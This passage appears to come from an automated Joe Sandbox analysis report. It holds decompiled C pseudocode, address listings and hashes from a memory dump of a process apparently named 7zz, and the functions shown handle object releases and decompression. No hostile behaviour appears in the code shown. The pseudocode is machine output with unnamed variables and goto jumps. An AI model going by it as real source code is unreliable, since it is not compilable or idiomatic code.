									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x10)) + 8)) + _t451 - 1)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x10)) + 8)) + _t650 - 1));
								} while (_t650 < _t623);
								goto L102;
							}
							_t624 =  *((intOrPtr*)( *_t364 + 0xc))(_t364, _t661 + 0x48, 0);
							__eflags = _t624;
							if(_t624 != 0) {
								_t368 =  *(_t661 + 0x14);
								 *(_t661 + 0x78) = 0;
								__eflags = _t368;
								if(_t368 != 0) {
									 *((intOrPtr*)( *_t368 + 8))(_t368);
								}
								_t643 =  *((intOrPtr*)(_t661 + 0x10));
								 *(_t661 + 0x78) = 0xffffffff;
								_t369 =  *(_t643 + 0x24);
								__eflags = _t369 - _t451;
								if(_t369 != _t451) {
									 *((intOrPtr*)( *_t369 + 8))(_t369);
									 *(_t643 + 0x24) = _t451;
								}
								_t370 =  *(_t643 + 0x4c);
								__eflags = _t370 - _t451;
								if(_t370 != _t451) {
									 *((intOrPtr*)( *_t370 + 8))(_t370);
									 *(_t643 + 0x4c) = _t451;
								}
								_t371 =  *(_t643 + 0x74);
								__eflags = _t371 - _t451;
								if(_t371 != _t451) {
									 *((intOrPtr*)( *_t371 + 8))(_t371);
									 *(_t643 + 0x74) = _t451;
								}
								_t372 =  *(_t643 + 0xb4);
								__eflags = _t372 - _t451;
								if(_t372 == _t451) {
									goto L130;
								} else {
									 *((intOrPtr*)( *_t372 + 8))(_t372);
									 *(_t643 + 0xb4) = _t451;
									_t310 = _t624;
									goto L142;
								}
							}
							goto L100;
						}
					}
					_t446 =  *_t312;
					__eflags = _t446;
					if(_t446 == 0) {
						goto L10;
					}
					_t548 =  *_t446;
					_t447 =  *(_t446 + 4);
					__eflags = _t447;
					 *((intOrPtr*)(_t661 + 0x58)) = _t548;
					 *(_t661 + 0x5c) = _t447;
					if(__eflags > 0) {
						goto L10;
					}
					if(__eflags < 0) {
						L9:
						 *(_t661 + 0x88) = 1;
						goto L10;
					}
					__eflags = _t548 - 0x1000000;
					if(_t548 > 0x1000000) {
						goto L10;
					}
					goto L9;
				} else {
					_t310 = 0x8007000e;
					goto L142;
				}
			}




























































































                                                                                                                                    0x004442e0
                                                                                                                                    0x004442e2
                                                                                                                                    0x004442ed
                                                                                                                                    0x004442ee
                                                                                                                                    0x004442f5
                                                                                                                                    0x00444300
                                                                                                                                    0x00444305
                                                                                                                                    0x00444309
                                                                                                                                    0x00444bf6
                                                                                                                                    0x00444bf6
                                                                                                                                    0x00444bfb
                                                                                                                                    0x00444c03
                                                                                                                                    0x00444c0d
                                                                                                                                    0x00444c0d
                                                                                                                                    0x0044430f
                                                                                                                                    0x00444317
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444324
                                                                                                                                    0x00444330
                                                                                                                                    0x00444339
                                                                                                                                    0x0044433b
                                                                                                                                    0x00444343
                                                                                                                                    0x00444347
                                                                                                                                    0x0044434b
                                                                                                                                    0x00444376
                                                                                                                                    0x00444376
                                                                                                                                    0x0044437a
                                                                                                                                    0x0044438b
                                                                                                                                    0x00444391
                                                                                                                                    0x00444394
                                                                                                                                    0x00444398
                                                                                                                                    0x004443a0
                                                                                                                                    0x004443ac
                                                                                                                                    0x004443b4
                                                                                                                                    0x004443c0
                                                                                                                                    0x004443c8
                                                                                                                                    0x004443d7
                                                                                                                                    0x004443dc
                                                                                                                                    0x004443e5
                                                                                                                                    0x004443ea
                                                                                                                                    0x004443fd
                                                                                                                                    0x00444400
                                                                                                                                    0x00444407
                                                                                                                                    0x0044440d
                                                                                                                                    0x00444411
                                                                                                                                    0x00444411
                                                                                                                                    0x00444413
                                                                                                                                    0x00444424
                                                                                                                                    0x0044442c
                                                                                                                                    0x0044442e
                                                                                                                                    0x0044442e
                                                                                                                                    0x00444430
                                                                                                                                    0x00444434
                                                                                                                                    0x00444438
                                                                                                                                    0x0044443c
                                                                                                                                    0x00444443
                                                                                                                                    0x00444447
                                                                                                                                    0x0044444b
                                                                                                                                    0x0044444f
                                                                                                                                    0x00444453
                                                                                                                                    0x00444457
                                                                                                                                    0x0044445b
                                                                                                                                    0x00444460
                                                                                                                                    0x00444462
                                                                                                                                    0x00444462
                                                                                                                                    0x00444464
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444466
                                                                                                                                    0x00444466
                                                                                                                                    0x0044446a
                                                                                                                                    0x00444482
                                                                                                                                    0x00444484
                                                                                                                                    0x00444486
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044448c
                                                                                                                                    0x00444490
                                                                                                                                    0x00444492
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444494
                                                                                                                                    0x0044449d
                                                                                                                                    0x0044449d
                                                                                                                                    0x0044449f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044449f
                                                                                                                                    0x004449c7
                                                                                                                                    0x004449cb
                                                                                                                                    0x004449d0
                                                                                                                                    0x004449d2
                                                                                                                                    0x004449d7
                                                                                                                                    0x004449d7
                                                                                                                                    0x004449da
                                                                                                                                    0x004449de
                                                                                                                                    0x004449e9
                                                                                                                                    0x004449f1
                                                                                                                                    0x004449f9
                                                                                                                                    0x00444a04
                                                                                                                                    0x00444a09
                                                                                                                                    0x00000000
                                                                                                                                    0x004444a1
                                                                                                                                    0x004444a1
                                                                                                                                    0x004444a3
                                                                                                                                    0x004444a6
                                                                                                                                    0x004444aa
                                                                                                                                    0x00444a10
                                                                                                                                    0x00444a12
                                                                                                                                    0x00444a14
                                                                                                                                    0x00444ad1
                                                                                                                                    0x00444ad1
                                                                                                                                    0x00444adc
                                                                                                                                    0x00444ade
                                                                                                                                    0x00444ae2
                                                                                                                                    0x00444ae4
                                                                                                                                    0x00444ae9
                                                                                                                                    0x00444aee
                                                                                                                                    0x00444aee
                                                                                                                                    0x00444af4
                                                                                                                                    0x00444afc
                                                                                                                                    0x00444b04
                                                                                                                                    0x00444b0c
                                                                                                                                    0x00444b11
                                                                                                                                    0x00444b17
                                                                                                                                    0x00444b19
                                                                                                                                    0x00444b1e
                                                                                                                                    0x00444b21
                                                                                                                                    0x00444b21
                                                                                                                                    0x00444b2b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444a1a
                                                                                                                                    0x00444a1a
                                                                                                                                    0x00444a1a
                                                                                                                                    0x00444a24
                                                                                                                                    0x00444a27
                                                                                                                                    0x00444a2c
                                                                                                                                    0x00444a35
                                                                                                                                    0x00444a36
                                                                                                                                    0x00444a38
                                                                                                                                    0x00444a3b
                                                                                                                                    0x00444a3d
                                                                                                                                    0x00444a3d
                                                                                                                                    0x00444a42
                                                                                                                                    0x00444a45
                                                                                                                                    0x00444a56
                                                                                                                                    0x00444a59
                                                                                                                                    0x00444a62
                                                                                                                                    0x00444a6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444a71
                                                                                                                                    0x00444a74
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444a76
                                                                                                                                    0x00000000
                                                                                                                                    0x00444a76
                                                                                                                                    0x00444a5b
                                                                                                                                    0x00000000
                                                                                                                                    0x00444a47
                                                                                                                                    0x00444a4e
                                                                                                                                    0x00444a7b
                                                                                                                                    0x00444a8e
                                                                                                                                    0x00444a9f
                                                                                                                                    0x00444aa6
                                                                                                                                    0x00444aa9
                                                                                                                                    0x00444aae
                                                                                                                                    0x00444ab0
                                                                                                                                    0x00444ab0
                                                                                                                                    0x00444ab5
                                                                                                                                    0x00444ab8
                                                                                                                                    0x00444ab8
                                                                                                                                    0x00444aae
                                                                                                                                    0x00444abd
                                                                                                                                    0x00444ac1
                                                                                                                                    0x00444ac2
                                                                                                                                    0x00444ac4
                                                                                                                                    0x00444ac4
                                                                                                                                    0x00000000
                                                                                                                                    0x00444a1a
                                                                                                                                    0x004444b0
                                                                                                                                    0x004444b0
                                                                                                                                    0x004444b3
                                                                                                                                    0x004444be
                                                                                                                                    0x004444c2
                                                                                                                                    0x004444c2
                                                                                                                                    0x004444c6
                                                                                                                                    0x004444d6
                                                                                                                                    0x004444d9
                                                                                                                                    0x004444dc
                                                                                                                                    0x004444df
                                                                                                                                    0x004444ec
                                                                                                                                    0x004444ed
                                                                                                                                    0x004444ef
                                                                                                                                    0x004444f2
                                                                                                                                    0x004444f4
                                                                                                                                    0x004444f4
                                                                                                                                    0x004444fe
                                                                                                                                    0x00444501
                                                                                                                                    0x00444524
                                                                                                                                    0x0044452d
                                                                                                                                    0x00444542
                                                                                                                                    0x00444550
                                                                                                                                    0x00444554
                                                                                                                                    0x0044455a
                                                                                                                                    0x0044455a
                                                                                                                                    0x0044455e
                                                                                                                                    0x00444562
                                                                                                                                    0x00444564
                                                                                                                                    0x00444568
                                                                                                                                    0x004446de
                                                                                                                                    0x004446e0
                                                                                                                                    0x004446f8
                                                                                                                                    0x004446fa
                                                                                                                                    0x00444705
                                                                                                                                    0x00444705
                                                                                                                                    0x00444707
                                                                                                                                    0x00444707
                                                                                                                                    0x0044470e
                                                                                                                                    0x00444711
                                                                                                                                    0x00444723
                                                                                                                                    0x00444729
                                                                                                                                    0x00444729
                                                                                                                                    0x00444713
                                                                                                                                    0x0044471a
                                                                                                                                    0x0044471a
                                                                                                                                    0x0044472e
                                                                                                                                    0x00444730
                                                                                                                                    0x0044487b
                                                                                                                                    0x0044488a
                                                                                                                                    0x004448a0
                                                                                                                                    0x004448a7
                                                                                                                                    0x004448aa
                                                                                                                                    0x004448af
                                                                                                                                    0x0044493e
                                                                                                                                    0x0044493e
                                                                                                                                    0x0044493e
                                                                                                                                    0x0044493e
                                                                                                                                    0x00000000
                                                                                                                                    0x0044493e
                                                                                                                                    0x004448b5
                                                                                                                                    0x004448bb
                                                                                                                                    0x004448c1
                                                                                                                                    0x004448c4
                                                                                                                                    0x004448d9
                                                                                                                                    0x004448d9
                                                                                                                                    0x004448dc
                                                                                                                                    0x004448df
                                                                                                                                    0x004448f6
                                                                                                                                    0x004448ff
                                                                                                                                    0x00444902
                                                                                                                                    0x00444905
                                                                                                                                    0x00444907
                                                                                                                                    0x0044490b
                                                                                                                                    0x0044490b
                                                                                                                                    0x00444912
                                                                                                                                    0x00444915
                                                                                                                                    0x00444915
                                                                                                                                    0x00444916
                                                                                                                                    0x00444916
                                                                                                                                    0x0044491a
                                                                                                                                    0x0044491f
                                                                                                                                    0x0044491f
                                                                                                                                    0x00444922
                                                                                                                                    0x00444925
                                                                                                                                    0x00444927
                                                                                                                                    0x0044492f
                                                                                                                                    0x0044492f
                                                                                                                                    0x00444932
                                                                                                                                    0x00444935
                                                                                                                                    0x00444937
                                                                                                                                    0x00000000
                                                                                                                                    0x00444937
                                                                                                                                    0x004448d0
                                                                                                                                    0x004448d5
                                                                                                                                    0x004448d7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444736
                                                                                                                                    0x00444736
                                                                                                                                    0x00444739
                                                                                                                                    0x00444745
                                                                                                                                    0x0044474f
                                                                                                                                    0x00444755
                                                                                                                                    0x0044475d
                                                                                                                                    0x0044476e
                                                                                                                                    0x00444775
                                                                                                                                    0x00444778
                                                                                                                                    0x0044477d
                                                                                                                                    0x0044480c
                                                                                                                                    0x00444816
                                                                                                                                    0x00444819
                                                                                                                                    0x00444820
                                                                                                                                    0x0044482f
                                                                                                                                    0x00444822
                                                                                                                                    0x00444826
                                                                                                                                    0x00444826
                                                                                                                                    0x00444832
                                                                                                                                    0x00444836
                                                                                                                                    0x0044483b
                                                                                                                                    0x00444846
                                                                                                                                    0x0044484f
                                                                                                                                    0x00444852
                                                                                                                                    0x00444855
                                                                                                                                    0x00444857
                                                                                                                                    0x0044485b
                                                                                                                                    0x0044485b
                                                                                                                                    0x00444860
                                                                                                                                    0x00444860
                                                                                                                                    0x00444860
                                                                                                                                    0x0044486c
                                                                                                                                    0x00000000
                                                                                                                                    0x0044486c
                                                                                                                                    0x00444783
                                                                                                                                    0x00444789
                                                                                                                                    0x0044478f
                                                                                                                                    0x00444792
                                                                                                                                    0x004447a7
                                                                                                                                    0x004447a7
                                                                                                                                    0x004447aa
                                                                                                                                    0x004447ad
                                                                                                                                    0x004447c4
                                                                                                                                    0x004447cd
                                                                                                                                    0x004447d0
                                                                                                                                    0x004447d3
                                                                                                                                    0x004447d5
                                                                                                                                    0x004447d9
                                                                                                                                    0x004447d9
                                                                                                                                    0x004447e0
                                                                                                                                    0x004447e3
                                                                                                                                    0x004447e3
                                                                                                                                    0x004447e4
                                                                                                                                    0x004447e4
                                                                                                                                    0x004447e8
                                                                                                                                    0x004447ed
                                                                                                                                    0x004447ed
                                                                                                                                    0x004447f0
                                                                                                                                    0x004447f3
                                                                                                                                    0x004447f5
                                                                                                                                    0x004447fd
                                                                                                                                    0x004447fd
                                                                                                                                    0x00444800
                                                                                                                                    0x00444803
                                                                                                                                    0x00444805
                                                                                                                                    0x00000000
                                                                                                                                    0x00444805
                                                                                                                                    0x0044479e
                                                                                                                                    0x004447a3
                                                                                                                                    0x004447a5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004447a5
                                                                                                                                    0x00444730
                                                                                                                                    0x004446fc
                                                                                                                                    0x004446ff
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444701
                                                                                                                                    0x00000000
                                                                                                                                    0x00444701
                                                                                                                                    0x004446e8
                                                                                                                                    0x004446ea
                                                                                                                                    0x004446f4
                                                                                                                                    0x004446f4
                                                                                                                                    0x00000000
                                                                                                                                    0x004446f4
                                                                                                                                    0x004446ec
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446ee
                                                                                                                                    0x004446f2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446f2
                                                                                                                                    0x00444578
                                                                                                                                    0x0044457e
                                                                                                                                    0x00444580
                                                                                                                                    0x00444582
                                                                                                                                    0x00444646
                                                                                                                                    0x00444646
                                                                                                                                    0x00444648
                                                                                                                                    0x00444680
                                                                                                                                    0x00444684
                                                                                                                                    0x00444688
                                                                                                                                    0x00444688
                                                                                                                                    0x0044468a
                                                                                                                                    0x0044468e
                                                                                                                                    0x00444692
                                                                                                                                    0x0044469b
                                                                                                                                    0x0044469b
                                                                                                                                    0x0044469d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044469f
                                                                                                                                    0x004446a2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446a4
                                                                                                                                    0x00000000
                                                                                                                                    0x004446a4
                                                                                                                                    0x00444694
                                                                                                                                    0x00444699
                                                                                                                                    0x004446b0
                                                                                                                                    0x004446b3
                                                                                                                                    0x004446b5
                                                                                                                                    0x004446b8
                                                                                                                                    0x004446bb
                                                                                                                                    0x004446bd
                                                                                                                                    0x004446d3
                                                                                                                                    0x004446d3
                                                                                                                                    0x00000000
                                                                                                                                    0x004446d3
                                                                                                                                    0x004446bf
                                                                                                                                    0x004446c5
                                                                                                                                    0x004446c5
                                                                                                                                    0x004446c9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446cd
                                                                                                                                    0x004446d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446d1
                                                                                                                                    0x004446c1
                                                                                                                                    0x004446c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004446c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00444699
                                                                                                                                    0x00444651
                                                                                                                                    0x00444653
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044465b
                                                                                                                                    0x0044465d
                                                                                                                                    0x00444675
                                                                                                                                    0x00444675
                                                                                                                                    0x00000000
                                                                                                                                    0x00444675
                                                                                                                                    0x0044465f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044466d
                                                                                                                                    0x0044466f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044466f
                                                                                                                                    0x00444588
                                                                                                                                    0x00000000
                                                                                                                                    0x00444594
                                                                                                                                    0x00444594
                                                                                                                                    0x00444594
                                                                                                                                    0x004445a9
                                                                                                                                    0x004445ab
                                                                                                                                    0x004445ad
                                                                                                                                    0x004445ef
                                                                                                                                    0x004445f2
                                                                                                                                    0x00444600
                                                                                                                                    0x00444600
                                                                                                                                    0x00444604
                                                                                                                                    0x00444606
                                                                                                                                    0x0044460b
                                                                                                                                    0x0044460e
                                                                                                                                    0x0044460e
                                                                                                                                    0x00444610
                                                                                                                                    0x00444610
                                                                                                                                    0x00444616
                                                                                                                                    0x0044461a
                                                                                                                                    0x0044461e
                                                                                                                                    0x00444621
                                                                                                                                    0x00444625
                                                                                                                                    0x00000000
                                                                                                                                    0x00444625
                                                                                                                                    0x004445f4
                                                                                                                                    0x004445fa
                                                                                                                                    0x00444b32
                                                                                                                                    0x00444b36
                                                                                                                                    0x00444b3b
                                                                                                                                    0x00444b3d
                                                                                                                                    0x00444b42
                                                                                                                                    0x00444b42
                                                                                                                                    0x00444b45
                                                                                                                                    0x00444b49
                                                                                                                                    0x00444b54
                                                                                                                                    0x00444b5c
                                                                                                                                    0x00444b61
                                                                                                                                    0x00444b66
                                                                                                                                    0x00444b68
                                                                                                                                    0x00444b6d
                                                                                                                                    0x00444b70
                                                                                                                                    0x00444b70
                                                                                                                                    0x00444b73
                                                                                                                                    0x00444b79
                                                                                                                                    0x00444b7b
                                                                                                                                    0x00444b80
                                                                                                                                    0x00444b83
                                                                                                                                    0x00444b83
                                                                                                                                    0x00444b89
                                                                                                                                    0x00444b89
                                                                                                                                    0x00000000
                                                                                                                                    0x00444b89
                                                                                                                                    0x00000000
                                                                                                                                    0x004445fa
                                                                                                                                    0x004445af
                                                                                                                                    0x004445b7
                                                                                                                                    0x004445bf
                                                                                                                                    0x004445c5
                                                                                                                                    0x004445c9
                                                                                                                                    0x004445d1
                                                                                                                                    0x004445d3
                                                                                                                                    0x004445de
                                                                                                                                    0x004445e1
                                                                                                                                    0x004445e9
                                                                                                                                    0x00444629
                                                                                                                                    0x00444629
                                                                                                                                    0x00444629
                                                                                                                                    0x00444633
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444635
                                                                                                                                    0x00444635
                                                                                                                                    0x0044463f
                                                                                                                                    0x00000000
                                                                                                                                    0x0044463f
                                                                                                                                    0x0044458a
                                                                                                                                    0x0044458e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444503
                                                                                                                                    0x00444503
                                                                                                                                    0x0044450b
                                                                                                                                    0x00444517
                                                                                                                                    0x00444518
                                                                                                                                    0x00444945
                                                                                                                                    0x00444945
                                                                                                                                    0x00000000
                                                                                                                                    0x00444945
                                                                                                                                    0x00444512
                                                                                                                                    0x00444515
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444515
                                                                                                                                    0x0044494c
                                                                                                                                    0x0044494c
                                                                                                                                    0x00444957
                                                                                                                                    0x00444957
                                                                                                                                    0x0044496b
                                                                                                                                    0x00444976
                                                                                                                                    0x0044497a
                                                                                                                                    0x0044497f
                                                                                                                                    0x00444981
                                                                                                                                    0x00444983
                                                                                                                                    0x0044498b
                                                                                                                                    0x004449a3
                                                                                                                                    0x004449a3
                                                                                                                                    0x004449a7
                                                                                                                                    0x004449a9
                                                                                                                                    0x004449c0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004449ab
                                                                                                                                    0x004449ab
                                                                                                                                    0x004449af
                                                                                                                                    0x004449b0
                                                                                                                                    0x004449b4
                                                                                                                                    0x004449ba
                                                                                                                                    0x004449ba
                                                                                                                                    0x00000000
                                                                                                                                    0x004449ab
                                                                                                                                    0x00444999
                                                                                                                                    0x0044499b
                                                                                                                                    0x0044499d
                                                                                                                                    0x00444b8d
                                                                                                                                    0x00444b91
                                                                                                                                    0x00444b96
                                                                                                                                    0x00444b98
                                                                                                                                    0x00444b9d
                                                                                                                                    0x00444b9d
                                                                                                                                    0x00444ba0
                                                                                                                                    0x00444ba4
                                                                                                                                    0x00444bac
                                                                                                                                    0x00444baf
                                                                                                                                    0x00444bb1
                                                                                                                                    0x00444bb6
                                                                                                                                    0x00444bb9
                                                                                                                                    0x00444bb9
                                                                                                                                    0x00444bbc
                                                                                                                                    0x00444bbf
                                                                                                                                    0x00444bc1
                                                                                                                                    0x00444bc6
                                                                                                                                    0x00444bc9
                                                                                                                                    0x00444bc9
                                                                                                                                    0x00444bcc
                                                                                                                                    0x00444bcf
                                                                                                                                    0x00444bd1
                                                                                                                                    0x00444bd6
                                                                                                                                    0x00444bd9
                                                                                                                                    0x00444bd9
                                                                                                                                    0x00444bdc
                                                                                                                                    0x00444be2
                                                                                                                                    0x00444be4
                                                                                                                                    0x00000000
                                                                                                                                    0x00444be6
                                                                                                                                    0x00444be9
                                                                                                                                    0x00444bec
                                                                                                                                    0x00444bf2
                                                                                                                                    0x00000000
                                                                                                                                    0x00444bf2
                                                                                                                                    0x00444be4
                                                                                                                                    0x00000000
                                                                                                                                    0x0044499d
                                                                                                                                    0x0044445b
                                                                                                                                    0x0044434d
                                                                                                                                    0x0044434f
                                                                                                                                    0x00444351
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444353
                                                                                                                                    0x00444355
                                                                                                                                    0x00444358
                                                                                                                                    0x0044435a
                                                                                                                                    0x0044435e
                                                                                                                                    0x00444362
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444364
                                                                                                                                    0x0044436e
                                                                                                                                    0x0044436e
                                                                                                                                    0x00000000
                                                                                                                                    0x0044436e
                                                                                                                                    0x00444366
                                                                                                                                    0x0044436c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00444326
                                                                                                                                    0x00444326
                                                                                                                                    0x00000000
                                                                                                                                    0x00444326

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
                                                                                                                                    • Instruction ID: d9c78973a52d2a71a409461f923dbd808430b2c09cbe0837c917e918da1c98db
                                                                                                                                    • Opcode Fuzzy Hash: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
                                                                                                                                    • Instruction Fuzzy Hash: D75239706087418FE724CF29C480B6AF7E2BFC5314F148A1EE59987791DB38E846CB5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004514F0 Relevance: .6, Instructions: 565COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E004514F0(void* __ecx) {
				signed int _t218;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				void* _t238;
				signed int _t239;
				void* _t243;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t273;
				signed int _t274;
				char _t282;
				void* _t288;
				intOrPtr _t298;
				signed int _t301;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t317;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t325;
				signed int _t330;
				signed int _t332;
				signed int _t338;
				signed int _t351;
				signed int _t361;
				signed int _t370;
				intOrPtr _t371;
				signed int _t379;
				void* _t383;
				signed int _t394;
				void* _t396;
				signed int _t403;
				intOrPtr _t405;
				signed int _t406;
				signed int _t407;
				intOrPtr* _t412;
				signed int _t425;
				intOrPtr _t430;
				signed int _t431;
				signed int _t437;
				signed int _t449;
				intOrPtr _t455;
				intOrPtr _t466;
				signed int* _t473;
				unsigned int _t477;
				signed int _t480;
				signed int _t485;
				signed int _t489;
				unsigned int _t493;
				signed int _t496;
				intOrPtr _t497;
				unsigned int _t501;
				signed int _t504;
				intOrPtr _t505;
				intOrPtr _t508;
				intOrPtr _t511;
				signed int _t513;
				signed int _t514;
				signed int* _t515;
				intOrPtr* _t516;
				signed int _t517;
				signed int* _t518;
				signed int _t519;
				void* _t522;
				void* _t523;

				_t522 = __ecx;
				if( *(__ecx + 0x1cbc) == 0xfffffffe) {
					_t518 = __ecx + 8;
					 *(__ecx + 0x1cbc) = 0;
					E0040DFF3(_t518);
					_t518[9] = 0x20;
					if( *((intOrPtr*)(__ecx + 0x1cb8)) == 0 ||  *((intOrPtr*)(__ecx + 0x68)) == 0) {
						if(_t518[9] >= 0x10) {
							do {
								_t303 =  *_t518;
								if(_t303 < _t518[1]) {
									_t304 = _t303 + 1;
									__eflags = _t304;
									 *(_t523 + 0x14) =  *_t303;
									 *_t518 = _t304;
								} else {
									 *(_t523 + 0x14) = E0040E070(_t518);
								}
								_t305 =  *_t518;
								if(_t305 < _t518[1]) {
									_t306 = _t305 + 1;
									__eflags = _t306;
									 *(_t523 + 0x18) =  *_t305;
									 *_t518 = _t306;
								} else {
									 *(_t523 + 0x18) = E0040E070(_t518);
								}
								_t425 = _t518[9] + 0xfffffff0;
								_t518[9] = _t425;
								_t518[8] = (_t518[8] << 0x00000008 |  *(_t523 + 0x18) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x14) & 0x000000ff;
							} while (_t425 >= 0x10);
						}
					}
					if( *((intOrPtr*)(_t522 + 0x1cb8)) == 0) {
						 *((char*)(_t522 + 0x1cc0)) = 0;
						 *(_t522 + 0x1cb4) = 0;
						E004514C0(_t522);
						_t519 = 0xb71b00;
						_t330 = 1;
						if( *((intOrPtr*)(_t522 + 0x1cc1)) == 0) {
							_t330 = 0 | E00450B20(1) != 0x00000000;
							if(1 != 0) {
								_t301 = E00450B20(0x10);
								_t519 = _t301 << 0x00000010 | E00450B20(0x10);
							}
						}
						_t298 =  *((intOrPtr*)(_t522 + 0x1cac));
						 *(_t298 + 0x18) = _t330;
						 *(_t298 + 0x14) = _t519;
						 *((intOrPtr*)(_t298 + 0xc)) = 0;
						 *((intOrPtr*)(_t298 + 0x10)) = 0;
						 *(_t522 + 0x58) = 0;
						 *(_t522 + 0x5c) = 0;
						 *(_t522 + 0x60) = 0;
					}
				}
				if( *(_t522 + 0x1cbc) <= 0) {
					_t514 =  *(_t523 + 0x40);
					goto L25;
				} else {
					while(1) {
						_t517 =  *(_t523 + 0x40);
						if(_t517 <= 0) {
							break;
						}
						_t412 = _t522 + 0x30;
						_t288 =  *((intOrPtr*)(_t522 + 0x34)) -  *(_t522 + 0x58) - 1;
						_t466 =  *((intOrPtr*)(_t412 + 0x10));
						if(_t288 >= _t466) {
							_t288 = _t288 + _t466;
						}
						 *((char*)( *((intOrPtr*)(_t412 + 4)) +  *_t412)) =  *((intOrPtr*)(_t288 +  *_t412));
						_t511 =  *((intOrPtr*)(_t412 + 4)) + 1;
						 *((intOrPtr*)(_t412 + 4)) = _t511;
						_t541 = _t511 -  *((intOrPtr*)(_t412 + 8));
						if(_t511 ==  *((intOrPtr*)(_t412 + 8))) {
							L0040EFBD(_t412, _t541);
						}
						_t513 =  *(_t522 + 0x1cbc) - 1;
						_t514 = _t517 - 1;
						 *(_t522 + 0x1cbc) = _t513;
						 *(_t523 + 0x40) = _t514;
						if(_t513 > 0) {
							continue;
						} else {
							L25:
							if(_t514 <= 0) {
								break;
							} else {
								while( *(_t522 + 0x1cb4) != 0 || E00451050(_t522) != 0) {
									_t218 =  *(_t522 + 0x1cb4);
									_t332 = _t218;
									if(_t218 >= _t514) {
										_t332 = _t514;
									}
